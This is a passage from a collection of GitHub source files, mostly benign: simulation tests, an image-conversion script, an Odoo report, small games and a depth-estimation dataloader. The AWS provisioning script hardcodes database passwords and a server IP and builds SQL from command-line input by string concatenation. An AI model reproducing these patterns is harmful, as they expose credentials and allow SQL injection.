time_limit=100)\n\n actions = {agent: {agent.longitudinal_force: 1}}\n\n while engine.game_on:\n engine.step(actions)\n\n assert agent.position[0] == 50\n\n engine.terminate()\n\n\ndef test_beam_area(base_forward_interactive_agent_external):\n playground = SingleRoom(size=(200, 200))\n agent = base_forward_interactive_agent_external\n\n area = CoordinateSampler(center=(50, 50), area_shape='rectangle', size=(20, 20))\n\n beam = InvisibleBeam(destination=area)\n\n playground.add_agent(agent, ((100, 100), 0))\n playground.add_element(beam, ((140, 100), 0))\n\n engine = Engine(playground, time_limit=100)\n\n actions = {agent: {agent.longitudinal_force: 1}}\n\n while not agent.teleported_to:\n engine.step(actions)\n\n assert 30 <= agent.position[0] <= 80\n assert 30 <= agent.position[1] <= 80\n\n\ndef test_beam_homing(base_forward_interactive_agent_external):\n\n playground = SingleRoom(size=(200, 200))\n agent = base_forward_interactive_agent_external\n\n destination = Physical(config_key='pentagon')\n playground.add_element(destination, ((70, 70), 0))\n\n beam = VisibleBeamHoming(destination=destination, invisible_range=4)\n\n playground.add_agent(agent, ((100, 100), 0))\n playground.add_element(beam, ((140, 100), 0))\n\n engine = Engine(playground, time_limit=100)\n\n actions = {agent: {agent.longitudinal_force: 1}}\n\n while not agent.teleported_to:\n engine.step(actions)\n\n assert agent.position.get_distance(destination.position) < agent.base_platform.radius + destination.radius + 4 + 3\n\n\ndef test_portal(base_forward_interactive_agent_external):\n\n playground = SingleRoom(size=(200, 200))\n agent = base_forward_interactive_agent_external\n\n portal_1 = Portal(color=PortalColor.RED)\n portal_2 = Portal(color=PortalColor.BLUE)\n portal_3 = Portal(color=PortalColor.GREEN)\n portal_4 = Portal(color=(50, 50, 50))\n\n playground.add_agent(agent, ((100, 80), 0))\n playground.add_element(portal_1, ((140, 80), math.pi))\n playground.add_element(portal_2, ((50, 50), math.pi/2))\n 
playground.add_element(portal_3, ((50, 120), -math.pi/2))\n playground.add_element(portal_4, ((150, 160), math.pi))\n\n portal_1.destination = portal_2\n portal_3.destination = portal_4\n\n engine = Engine(playground, time_limit=1000)\n\n actions = {agent: {agent.longitudinal_force: 1}}\n\n while engine.game_on:\n engine.step(actions)\n\n assert agent.position[1] == 160\n assert agent.angle % (2 * math.pi) == math.pi\n","repo_name":"emasquil/simple-playgrounds","sub_path":"tests/test_elements/test_teleport_elements.py","file_name":"test_teleport_elements.py","file_ext":"py","file_size_in_byte":3759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"43528061396","text":"import boto3\nimport time\nimport pymysql.cursors\nimport sys\nfrom pymysql import MySQLError\n\nkey_id = \"\"\naccesskey = \"\"\n\ncommunity_name_full = ' '.join(sys.argv[1:])\ncommunity_name = ''.join(e for e in community_name_full if e.isalnum())\n\n\nelbv2 = boto3.client('elbv2', aws_access_key_id=key_id,\n aws_secret_access_key=accesskey, region_name='us-west-1')\n\n\ntgresponse = elbv2.create_target_group(\n Name=community_name,\n Port=80,\n Protocol='HTTP',\n VpcId='vpc-58eeb33c',\n)\n\ntarget_group_arn = tgresponse['TargetGroups'][0]['TargetGroupArn']\n\nlbresponse = elbv2.create_load_balancer(\n Name=community_name,\n Subnets = ['subnet-a66966fe', 'subnet-f8f9079f'],\n SecurityGroups = ['sg-e22a2784']\n)\nlb_arn = lbresponse['LoadBalancers'][0]['LoadBalancerArn']\nlb_ip = lbresponse['LoadBalancers'][0]['DNSName']\nprint(elbv2.describe_load_balancers(\n LoadBalancerArns=[lb_arn]\n))\n\nlistenerresponse = elbv2.create_listener(\n DefaultActions=[\n {\n 'TargetGroupArn': target_group_arn,\n 'Type': 'forward',\n },\n ],\n Port=80,\n Protocol='HTTP',\n LoadBalancerArn=lb_arn,\n)\n\nauto_scaling = boto3.client('autoscaling', aws_access_key_id=key_id,\n aws_secret_access_key=accesskey, region_name='us-west-1')\nauto_scale_response = auto_scaling.create_auto_scaling_group(\n AutoScalingGroupName=community_name,\n LaunchConfigurationName='Community_Launch',\n MaxSize=5,\n MinSize=2,\n VPCZoneIdentifier='subnet-a66966fe, subnet-f8f9079f',\n TargetGroupARNs=[target_group_arn]\n)\n\nauto_scale_instance = auto_scaling.describe_auto_scaling_groups(\n AutoScalingGroupNames=[community_name]\n)\n\n\nrds = boto3.client('rds', aws_access_key_id=key_id,\n aws_secret_access_key=accesskey, region_name='us-west-1')\n\nrds_response = rds.create_db_instance(\n AllocatedStorage=5,\n DBName=community_name,\n DBInstanceClass='db.t2.micro',\n DBInstanceIdentifier=community_name+\"rdsdb\",\n Engine='MySQL',\n MasterUserPassword='redhat123',\n MasterUsername='admin',\n VpcSecurityGroupIds=['sg-e22a2784'],\n DBSubnetGroupName='community_db'\n )\n\nrds_name = rds_response['DBInstance']['DBName']\nrds_arn = rds_response['DBInstance']['DBInstanceArn']\n\nrds_response = rds.describe_db_instances(\n DBInstanceIdentifier=community_name+'rdsdb',\n)\nwhile rds_response['DBInstances'][0]['DBInstanceStatus'] != 'available':\n time.sleep(60)\n rds_response = rds.describe_db_instances(\n DBInstanceIdentifier=community_name + 'rdsdb',\n )\nrds_ip = rds_response['DBInstances'][0]['Endpoint']['Address']\n\n\n\ntry:\n db = pymysql.connect(\"54.183.103.17\", \"root\", \"redhat\", \"cmpe281\")\nexcept MySQLError as e:\n print(e)\n# prepare a cursor object using cursor() method\ncursor = db.cursor()\n\nsql = \"insert into community_details 
values('\"+community_name_full+\"','\"+rds_arn+\"','\"+community_name+\"rdsdb\"+\"','\"+\\\n rds_ip+\"','\"+target_group_arn+\"','\"+lb_arn+\"','\"+lb_ip+\"');\"\n\ntry:\n cursor.execute(sql)\nexcept:\n print(\"Error: unable to insert data\")\ndb.commit()\n\ntry:\n db = pymysql.connect(rds_ip, \"admin\", \"redhat123\")\nexcept:\n print('failed1')\n# prepare a cursor object using cursor() method\ncursor = db.cursor()\n\nsql = \"create database cmpe281;\"\n\ntry:\n cursor.execute(sql)\nexcept:\n print(\"Error Here1\")\n\ndb.commit()\n\ntry:\n db = pymysql.connect(rds_ip, \"admin\", \"redhat123\", \"cmpe281\")\nexcept:\n print('failed')\ncursor = db.cursor()\nsql = \"create table login(`username` varchar(30), `password` varchar(20), `community_name` varchar(20));\"\nprint(sql)\n\ntry:\n cursor.execute(sql)\nexcept:\n print(\"Error Here2\")\n\nsql = \"create table userdata(`username` varchar(30), `first name` varchar(20), `last name` varchar(20), `email` \" \\\n \"varchar(50), `address` varchar(50), `phone` varchar(20), `community` varchar(40), `picurl` varchar(300));\"\nprint(sql)\n\ntry:\n cursor.execute(sql)\nexcept:\n print(\"Error Here3\")\n\nsql = \"create table groups(`groupname` varchar(30), `grouptype` varchar(5), `community` varchar(40));\"\nprint(sql)\n\ntry:\n cursor.execute(sql)\nexcept:\n print(\"Error Here3\")\ndb.commit()\n\ndb.close()","repo_name":"navoday-91/Social_Community","sub_path":"TestingGround.py","file_name":"TestingGround.py","file_ext":"py","file_size_in_byte":4170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3932557824","text":"#######. This algorithm is to convert the excel files into tiff images and arrays. #######\n#Our dataset were in the form of excel tables, to convert these tables into a tiff image, I created this Convert function.\n#To perform this conversion, we have calculated a displacement step called \"step\", \n#because this table represents a multispectral and thermal georeferential part (you can see the different \n#columns in the data / Excel folder) extracted from ERDAS software, so the step represents its resolution.\n#We can display them all 7 at once, for that we saved them in pictures but each length differently \n#(You can see it in the data / TIFandNPY folder\n \n#Loading packages\nfrom PIL import Image\nimport xlrd\nimport numpy as np\nimport os,sys\nfrom skimage.io import imsave,imread\nimport math\nfrom os.path import join\n#import pathproject as pp #TODO creation of a file containing every paths\n\n\ndef mymkdir(path):\n\tif not os.path.exists(path):\n\t\tos.mkdir(path)\n\ndef Convert(PathImportExcel,PathExportTif, channels=[3,4,5,6,7,8,9], step=12,factor=1000):\n print('The channels used are : ',channels)\n #Initialization of indices of images for each channel \n print(os.listdir(PathImportExcel))\n for element in list(os.listdir(PathImportExcel)):\n if element.find('~$')==-1 and element.find('.D')==-1:\n name=element.replace('.xlsx','')\n print(element)\n file= xlrd.open_workbook(PathImportExcel+element)\n #Initilization of indice of subsets\n for k in file.sheet_names():\n tableau = file.sheet_by_name(str(k))\n # Writting the number of lines of each subset \n print('le nombre de lignes de '+str(k)+' %s ' % tableau.nrows)\n # Writting the number of lines of each subset\n print('le nombre de colonnes '+str(k)+' '+'%s ' % tableau.ncols)\n minX=sys.maxsize\n maxX=-sys.maxsize\n minY=sys.maxsize\n maxY=-sys.maxsize\n for l in range(1,tableau.nrows):\n 
x=tableau.cell_value(l,1)*factor\n minX=min(minX,x)\n maxX=max(maxX,x)\n y=tableau.cell_value(l,2)*factor\n minY=min(minY,y)\n maxY=max(maxY,y)\n #Determination's resolution\n tab=[]\n for i in range(1,4000):\n tab.append(tableau.cell_value(i,1)*factor)\n table=[]\n for i in tab:\n if not i in table:\n table.append(i)\n step=int(table[2]-table[1])\n xSize=1+(maxX-minX)/step\n ySize=1+(maxY-minY)/step\n size =(round(xSize),round(ySize))\n print('the image\"s size:',size)\n namesubset=name+'_'+str(k)\n image_tif_path = join(PathExportTif,namesubset,'ImageTif')\n image_array_path = join(PathExportTif,namesubset,'ImageArray')\n mask_tif_path = join(PathExportTif,namesubset,'MaskTif')\n mask_array_path = join(PathExportTif,namesubset,'MaskArray')\n mymkdir(join(PathExportTif,namesubset))\n mymkdir(image_tif_path)\n mymkdir(image_array_path)\n mymkdir(mask_tif_path)\n mymkdir(mask_array_path)\n matrix=np.zeros([size[0],size[1],len(channels)], dtype=np.float32)\n for cid, h in enumerate(channels):\n image= np.zeros((size[0],size[1]), dtype=np.float32)\n for l in range(1,tableau.nrows):\n i=math.floor((tableau.cell_value(l,1)*factor-minX+step/2.)/step)\n j=math.floor((tableau.cell_value(l,2)*factor-minY+step/2.)/step)\n image[i,j]=(tableau.cell_value(l,h))\n matrix[i,j,cid]=tableau.cell_value(l,h)\n\n imageint=(255*(image-image.min())/(image.max()-image.min())).astype(np.uint8)\n imsave(join(image_tif_path,name+'_'+str(k)+'_B'+str(cid)+'.tif'),imageint)\n #np.save(join(image_array_path,namesubset,'_image.npy'),matrix)\n np.save(PathExportTif+'/'+namesubset+'/'+'ImageArray'+'/'+namesubset+'_image.npy',matrix)\n\n #SAVE MASK\n image= np.zeros((size[0],size[1],1), dtype=np.uint8) \n for l in range(1,tableau.nrows):\n i=int((tableau.cell_value(l,1)*factor-minX)/step)\n j=int((tableau.cell_value(l,2)*factor-minY)/step)\n v=tableau.cell_value(l,11) \n if v==\"other\":\n image[i,j]=0\n else:\n image[i,j]=255\n\n #else: \n #print('UNNKOWN '+v)\n #quit()\n imsave(PathExportTif+'/'+namesubset+'/'+'MaskTif'+'/'+name+'_'+str(k)+'_mask.tif',image)\n np.save(PathExportTif+'/'+namesubset+'/'+'MaskArray'+'/'+namesubset+'_mask.npy',np.float32(image/255.0))\n print(np.shape(image))\n del image\n\n\n#mainPath=os.getcwd()\n#mainPath = '/content/gdrive/My Drive/U-NET'\n#PathImportExcel=mainPath+'/data/Excel/'\n#mymkdir(mainPath+'/data/TIFandNPY')\n\n#PathExportTif=mainPath+'/data/TIFandNPY/'\n\nPathImportExcel='/content/gdrive/My Drive/U-NET/data/Excel/'\nmymkdir('/content/gdrive/My Drive/U-NET/data/TIFandNPY')\n\nPathExportTif='/content/gdrive/My Drive/U-NET/data/TIFandNPY/'\n#Application of method convert \nConvert(PathImportExcel,PathExportTif)\n","repo_name":"GSacchetti/Segmentation-of-multispectral-and-thermal-images-with-U-NET","sub_path":"Construction_data/excel_to_tif_array.py","file_name":"excel_to_tif_array.py","file_ext":"py","file_size_in_byte":5669,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"18643341999","text":"from collections import Counter\nimport matplotlib.pyplot as plt\nimport json\n\nwith open('../../../../../../../Volumes/jakesExternalDrive/tweets.txt','r') as f:\n #with open('tweets.txt','r') as f:\n file = f.read()\n file = file.split('\\n\\n')[:-1]\n count = 0\n time_counts = Counter(json.loads(item)['created_at'].split(' ')[3] for item in file)\n\ntimes = sorted(time_counts)\ntime_vals = [time_counts[time] for time in times]\nplt.plot(times, time_vals)\nplt.ylabel('# of tweets')\nplt.title('That\\'s a lot of 
tweets!')\nplt.show()\n","repo_name":"jake-orielly/Getting_Started_with_Data_Science","sub_path":"midtermTwitter/tweetCount.py","file_name":"tweetCount.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37926311158","text":"# -*- coding: utf-8 -*-\n\nfrom datetime import datetime\n\nfrom odoo import models, fields, api\nfrom odoo.tools import DEFAULT_SERVER_DATE_FORMAT as DATE_FORMAT, DEFAULT_SERVER_DATETIME_FORMAT as DATETIME_FORMAT\n\n\nclass FacturasPendientesReportWizard(models.TransientModel):\n _name = 'facturas_pendientes.report.wizard'\n\n date_start = fields.Date(string=\"Fecha Inicio\", null=True)\n date_end = fields.Date(string=\"Fecha Final\", null=True)\n partner_id = fields.Many2one('res.partner', string=\"Cliente\")\n\n @api.multi\n def get_report(self):\n data = {\n 'ids': self.ids,\n 'model': self._name,\n 'form': {\n 'date_start': self.date_start,\n 'date_end': self.date_end,\n 'partner_id': self.partner_id.id,\n },\n }\n\n return self.env.ref('facturas_pendientes_report.recap_report').report_action(self, data=data)\n\n\nclass ReportFacturasPendientes(models.AbstractModel):\n\n _name = 'report.facturas_pendientes_report.recap_report_view'\n\n @api.model\n def _get_report_values(self, docids, data=None):\n date_start = data['form']['date_start']\n date_end = data['form']['date_end']\n start_report=''\n end_report=''\n if date_start:\n date_start_obj = datetime.strptime(date_start, DATE_FORMAT)\n start_report = date_start_obj.strftime('%d/%m/%Y')\n if date_end:\n date_end_obj = datetime.strptime(date_end, DATE_FORMAT)\n end_report = date_end_obj.strftime('%d/%m/%Y')\n partner_id = data['form']['partner_id']\n\n # print(partner_id)\n\n if partner_id:\n if date_start and date_end:\n facturas = self.env['account.invoice'].search(\n [('type', '=', 'out_invoice'), ('state', 'in', ['open', 'in_payment']),\n ('date_invoice', '>=', date_start_obj.strftime(DATETIME_FORMAT)),\n ('date_invoice', '<=', date_end_obj.strftime(DATETIME_FORMAT)),\n ('tax_line_ids', '!=', False)]).filtered(lambda x: x.partner_id.id == partner_id or x.partner_id.parent_id.id == partner_id)\n else:\n facturas = self.env['account.invoice'].search(\n [('type', '=', 'out_invoice'), ('state', 'in', ['open', 'in_payment']),\n ('tax_line_ids', '!=', False)]).filtered(lambda x: x.partner_id.id == partner_id or x.partner_id.parent_id.id == partner_id)\n else:\n if date_start and date_end:\n facturas = self.env['account.invoice'].search(\n [('type', '=', 'out_invoice'), ('state', 'in', ['open', 'in_payment']),\n ('date_invoice', '>=', date_start_obj.strftime(DATETIME_FORMAT)),\n ('date_invoice', '<=', date_end_obj.strftime(DATETIME_FORMAT)),\n ('tax_line_ids', '!=', False)])\n else:\n facturas = self.env['account.invoice'].search(\n [('type', '=', 'out_invoice'), ('state', 'in', ['open', 'in_payment']),\n ('tax_line_ids', '!=', False)])\n\n docs = sorted(facturas, key = lambda x: x.date_invoice)\n\n return {\n 'doc_ids': data['ids'],\n 'doc_model': data['model'],\n 'date_start':start_report,\n 'date_end': end_report,\n 'partner_id': partner_id,\n 'docs': docs,\n }\n","repo_name":"acostaw/erp_odoo","sub_path":"facturas_pendientes_report/models/facturas_pendientes.py","file_name":"facturas_pendientes.py","file_ext":"py","file_size_in_byte":3458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5931564078","text":"# 
------------------------------------------------------------------------------\n# The code is from GLPDepth (https://github.com/vinvino02/GLPDepth).\n# For non-commercial purpose only (research, evaluation etc).\n# ------------------------------------------------------------------------------\n\nimport os\nimport cv2\nfrom dataloaders.base_dataset import BaseDataset\nimport json\nimport scipy\nimport torch\nimport numpy as np\nimport random\n\n#f in mm\nbase_f=25e-3\ndef get_blur(s1,s2,f):\n blur=torch.abs(s2-s1)/s2/(s1-f)*(f**2)/(base_f**2)\n return blur\n\n#selected_dirs: what rgb directories are being selected : a list of indices of sorted dir names\nclass nyudepthv2(BaseDataset):\n def __init__(self, data_path, rgb_dir_list,depth_dir,\n is_train=True,is_blur=False, crop_size=(448, 576), scale_size=None):\n super().__init__(crop_size)\n\n print('crop_size:'+str(crop_size))\n if crop_size[0] > 480:\n scale_size = (int(crop_size[0]*640/480), crop_size[0])\n\n self.scale_size = scale_size\n self.is_train = is_train\n self.is_blur=is_blur\n self.data_path = os.path.join(data_path, 'nyu_depth_v2')\n # self.rgbpath=os.path.join(self.data_path,rgb_dir)\n self.depthpath=os.path.join(self.data_path,depth_dir)\n self.rgb_dir_list=rgb_dir_list\n # self.fdist=float(rgb_dir.split('_')[-1])\n # self.f=float(rgb_dir.split('_')[2])*1e-3\n for dirname in rgb_dir_list:\n splitvals=dirname.split('\\\\')\n #get last non empty string\n s_=[s for s in splitvals if len(s)>0]\n s=s_[-1]\n fdist=float(s.split('_')[4])\n f=float(s.split('_')[2])*1e-3\n print('rgb dir:'+str(s))\n print('fdist:'+str(fdist))\n print('f:'+str(f))\n \n #read scene names\n scene_path=os.path.join(self.data_path, 'scenes.mat')\n self.scenes=scipy.io.loadmat(scene_path)['scenes']\n\n #read splits\n splits_path=os.path.join(self.data_path, 'splits.mat')\n splits=scipy.io.loadmat(splits_path)\n if is_train:\n self.file_idx=list(splits['trainNdxs'][:,0])\n else:\n self.file_idx=list(splits['testNdxs'][:,0])\n\n self.image_path_list = []\n self.depth_path_list = []\n\n with open('nyu_class_list.json', 'r') as f:\n self.class_list = json.load(f)\n \n phase = 'train' if is_train else 'test'\n print(\"Dataset: NYU Depth V2\")\n print(\"# of %s images: %d\" % (phase, len(self.file_idx)))\n\n def __len__(self):\n return len(self.file_idx)\n\n def __getitem__(self, idx):\n\n num=self.file_idx[idx]\n #select an item from rgb_dir_list\n rgb_dir=random.choice(self.rgb_dir_list)\n splitvals=rgb_dir.split('\\\\')\n #get last non empty string\n s_=[s for s in splitvals if len(s)>0]\n s=s_[-1]\n #fdist in m\n fdist=float(s.split('_')[-1])\n #f in m\n f=float(s.split('_')[2])*1e-3\n \n # print('rgb dir:'+str(rgb_dir))\n # print('fdist:'+str(fdist))\n # print('f:'+str(f))\n # print('______')\n rgbpath=os.path.join(self.data_path,rgb_dir)\n gt_path=os.path.join(self.depthpath,(str(num)+\".png\"))\n img_path=os.path.join(rgbpath,(str(num)+\".png\"))\n scene_name=self.scenes[num-1][0][0][:-5]\n\n class_id = -1\n for i, name in enumerate(self.class_list):\n if name in scene_name:\n class_id = i\n break\n\n assert class_id >= 0\n\n image = cv2.imread(img_path)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n depth = cv2.imread(gt_path, cv2.IMREAD_UNCHANGED).astype('float32')\n\n if self.scale_size:\n image = cv2.resize(image, (self.scale_size[0], self.scale_size[1]))\n depth = cv2.resize(depth, (self.scale_size[0], self.scale_size[1]))\n \n if self.is_train:\n if self.is_blur==1:\n image,depth = self.augment_training_data_blur(image, depth)\n else:\n 
image,depth = self.augment_training_data(image, depth)\n else:\n image,depth = self.augment_test_data(image, depth)\n\n depth = depth / 1000.0 # convert in meters\n blur=get_blur(fdist,depth,f)\n\n return {'image': image, 'depth': depth, 'blur':blur, 'class_id': class_id,'fdist':fdist,'f':f}\n\n# for st_iter, sample_batch in enumerate(loader):\n# input_RGB = sample_batch['image']\n# depth_gt = sample_batch['depth']\n# class_id = sample_batch['class_id']\n# gt_blur = sample_batch['blur']\n# break\n\n# import matplotlib.pyplot as plt \n# gt_blur[gt_blur==-1]=0\n# b=(gt_blur.numpy())[0,:,:]\n# plt.imshow(b)\n# plt.show()\n\n# d=(depth_gt.numpy())[0,:,:]\n# plt.imshow(d)\n# plt.show()\n\ndef get_loader_stats(loader):\n print('getting NUY v2 stats...')\n xmin,xmax,xmean,count=100,0,0,0\n depthmin,depthmax,depthmean=100,0,0\n blurmin,blurmax,blurmean=100,0,0\n depthlist=torch.empty(0)\n for st_iter, sample_batch in enumerate(loader):\n input_RGB = sample_batch['image']\n depth_gt = sample_batch['depth']\n class_id = sample_batch['class_id']\n gt_blur = sample_batch['blur']\n\n xmin_=torch.min(input_RGB).cpu().item()\n if(xmin_xmax):\n xmax=xmax_\n xmean+=torch.mean(input_RGB).cpu().item()\n count+=1\n mask=depth_gt>0\n depth_gt=depth_gt[mask]\n t=torch.flatten(depth_gt)\n depthlist=torch.concat((depthlist,t),axis=0)\n depthmin_=torch.min(depth_gt).cpu().item()\n if(depthmin_depthmax):\n depthmax=depthmax_\n depthmean+=torch.mean(depth_gt).cpu().item()\n gt_blur=gt_blur[mask]\n blurmin_=torch.min(gt_blur).cpu().item()\n if(blurmin_blurmax):\n blurmax=blurmax_\n blurmean+=torch.mean(gt_blur).cpu().item()\n\n print('RGB min='+str(xmin))\n print('RGB max='+str(xmax))\n print('RGB mean='+str(xmean/count))\n\n print('depth min='+str(depthmin))\n print('depth max='+str(depthmax))\n print('depth mean='+str(depthmean/count))\n\n print('blur min='+str(blurmin))\n print('blur max='+str(blurmax))\n print('blur mean='+str(blurmean/count))\n return depthlist\n\n\n# data_path='D:\\\\data\\\\'\n# rgb_dir='refocused_f_25_fdist_2'\n# depth_dir='rawDepth'\n# is_blur=True\n# crop_size=(480,480)\n\n# train_dataset=nyudepthv2(data_path=data_path,rgb_dir=rgb_dir,depth_dir=depth_dir,crop_size=crop_size,is_blur=is_blur,is_train=True)\n# val_dataset=nyudepthv2(data_path=data_path,rgb_dir=rgb_dir,depth_dir=depth_dir,crop_size=crop_size,is_blur=is_blur,is_train=False)\n# train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=1,\n# num_workers=0,pin_memory=True)\n\n# val_loader = torch.utils.data.DataLoader(val_dataset, batch_size=1,\n# num_workers=0,pin_memory=True)\n\n# get_loader_stats(train_loader)\n\n\n# from configs.train_options import TrainOptions\n# from dataset.base_dataset import get_dataset\n# import torch\n\n# opt = TrainOptions()\n# args = opt.initialize().parse_args()\n# args.shift_window_test=True\n# args.flip_test=True\n\n# dataset_kwargs = {'dataset_name': args.dataset, 'data_path': args.data_path,'rgb_dir':args.rgb_dir, 'depth_dir':args.depth_dir,\n# 'selected_dirs':args.selected_dirs}\n# dataset_kwargs['crop_size'] = (args.crop_h, args.crop_w)\n\n# train_dataset = get_dataset(**dataset_kwargs,is_train=True)\n# # val_dataset = get_dataset(**dataset_kwargs, is_train=False)\n\n\n# train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=1,pin_memory=True)\n# # val_loader = torch.utils.data.DataLoader(val_dataset, batch_size=1,pin_memory=True)\n# loader=train_loader\n\n# 
get_loader_stats(loader)\n","repo_name":"sleekEagle/defocus_camind","sub_path":"source/dataloaders/nyudepthv2.py","file_name":"nyudepthv2.py","file_ext":"py","file_size_in_byte":8183,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"32418880418","text":"from typing import List\n\n\nclass Solution:\n    def makesquare_0(self, matchsticks: List[int]) -> bool:\n        total_len = sum(matchsticks)\n        if total_len % 4:\n            return False\n        matchsticks.sort(reverse=True)\n\n        edges = [0] * 4\n        def dfs(index):\n            if index == len(matchsticks):\n                return True\n            for i in range(4):\n                edges[i] += matchsticks[index]\n                if edges[i] <= total_len // 4 and dfs(index+1):\n                    return True\n                edges[i] -= matchsticks[index]\n            return False\n\n        return dfs(0)\n\n\n","repo_name":"Jooc/LeetCode","sub_path":"python-version/leetcode/Solution_473.py","file_name":"Solution_473.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"40973322579","text":"import os\nfrom tkinter import filedialog\nimport tkinter as tk\nimport pandas as pd\n\ndef createnewFile(file, path, LabelNmbr):\n    filename = file\n    filename = filename.replace('.csv','')\n    fileNmbr = 0\n    filename =filename+\"-Label-\"+str(LabelNmbr)+'-'+str(fileNmbr)\n\n\n    if(os.path.isfile(os.path.join(newpath,filename)+'.csv')): #In case a file already exists, i.e. the file name is already taken\n        return\n\n\n    '''\n    #\n    #Maybe this is still useful.\n    #Generates new file names until no file with the current name exists. (Increments the variable fileNmbr)\n    #\n\n    while(os.path.isfile(os.path.join(newpath,filename)+'.csv')):\n        print('file name already exists')\n        filename = filename[:-len(str(fileNmbr))]\n        fileNmbr +=1\n        filename = filename+str(fileNmbr) \n    '''\n\n    print('Creating File for Label: '+str(LabelNmbr))\n    text_file = open(os.path.join(newpath, filename)+'.csv', \"w+\")\n    text_file.write(\"time;Sensor Type;v1;v2;v3;Label\\n\")\n    \n    return text_file\n\ndef exportData(dirPath,file, newpath):\n\n\n    fileLabel1 = createnewFile(file,newpath, 1)\n    fileLabel2 = createnewFile(file,newpath, 2)\n    fileLabel3 = createnewFile(file,newpath, 3)\n\n    if (fileLabel1 is None) or (fileLabel2 is None) or (fileLabel3 is None):\n        print('File with name {} already exists! 
Aborting Mission.'.format(file))\n        return\n\n\n    contents = pd.read_csv(os.path.join(dirPath,file),delimiter=';')\n    df = pd.DataFrame(contents, columns = ['time','Sensor Type','v1','v2','v3','Label'])\n    for row in df.iterrows():\n\n        Time =row[1]['time']\n        SensorType =row[1]['Sensor Type']\n        v1 =row[1]['v1']\n        v2 =row[1]['v2']\n        v3 =row[1]['v3']\n        Label =row[1]['Label']\n\n        if(row[1]['Label'] == 1):\n            fileLabel1.write('{};{};{};{};{};{}\\n'.format(Time,SensorType,v1,v2,v3,Label))\n        elif(row[1]['Label'] == 2):\n            fileLabel2.write('{};{};{};{};{};{}\\n'.format(Time,SensorType,v1,v2,v3,Label))\n        elif(row[1]['Label'] == 3):\n            fileLabel3.write('{};{};{};{};{};{}\\n'.format(Time,SensorType,v1,v2,v3,Label))\n\nif __name__ == '__main__':\n\n    root = tk.Tk()\n    root.withdraw()\n    currdir = os.getcwd()\n    file_path = filedialog.askdirectory()\n    newpath = os.path.join(file_path,'extractedData')\n    print(file_path)\n    print('newpath: {}'.format(newpath))\n\n    if not os.path.exists(newpath):\n        print('Creating new directory for Labels')\n        os.makedirs(newpath)\n    else:\n        print('Directory already exists!')\n\n    for file in os.listdir(file_path):\n        if file.endswith('.csv'):\n            print('Exporting Data from {}'.format(file))\n            exportData(file_path, file, newpath)\n\n","repo_name":"cjmoeller/tug-server","sub_path":"dataExtractor.py","file_name":"dataExtractor.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"30580523804","text":"import emoji\r\n\r\ndef game(word: str):\r\n    squareList = []\r\n    guesses = 6\r\n    print(\"WELCOME TO WORDLE\")\r\n    print(\"The game is simple: guess a word and press enter \\nif any letters in the word are correct they will show up with a green square \\nif they are correct but in the wrong place a yellow \\nif wrong it will stay white \")\r\n    print(\"you only get 6 guesses\")\r\n    print(\"\")\r\n    \r\n    for i in range(len(word)):\r\n        print(emoji.emojize(\" :red_square:\"), end = \"\")\r\n    \r\n    while (True):\r\n        green = False\r\n        yellow = False\r\n        correct = False\r\n        print(\"\\nenter your guess, length is \",len(word))\r\n        guess = input()\r\n        \r\n        if (guess == word):\r\n            win(word)\r\n            break\r\n        elif (guesses > 0):\r\n            guesses -= 1\r\n            for i in range(len(guess)):\r\n                for j in range(len(word)):\r\n                    if (guess[i] == word[j] and i == j):\r\n                        green = True\r\n                    elif (guess[i] == word[j] and i != j):\r\n                        yellow = True\r\n                \r\n                if (green == True):\r\n                    print(emoji.emojize(\" :green_square:\"), end = \"\")\r\n                    green = False\r\n                    correct = True\r\n                elif (yellow == True):\r\n                    print(emoji.emojize(\" :yellow_square:\"), end = \"\")\r\n                    yellow = False\r\n                    correct = True\r\n                \r\n                if (correct != True):\r\n                    print(emoji.emojize(\" :red_square:\"), end = \"\")\r\n                else:\r\n                    correct = False\r\n            \r\n        else:\r\n            loose()\r\n            break\r\n        \r\n        \r\ndef win(word: str):\r\n    print(\"well done you have won the game\")\r\n    for i in range(len(word)):\r\n        print(emoji.emojize(\" :green_square:\"), end = \"\")\r\n\r\ndef loose():\r\n    print(\"unlucky too many guesses\")\r\n    \r\nif __name__ == \"__main__\":\r\n    word = \"computing\"\r\n    game(word)\r\n    ","repo_name":"paddyyates7890/WordleGame","sub_path":"wordle.py","file_name":"wordle.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16931531050","text":"# -*- coding: UTF-8 -*-\r\n# !/usr/bin/python\r\n# @time :2019/6/3 10:51\r\n# @author :Mo\r\n# @function :graph of CRNN\r\n# 
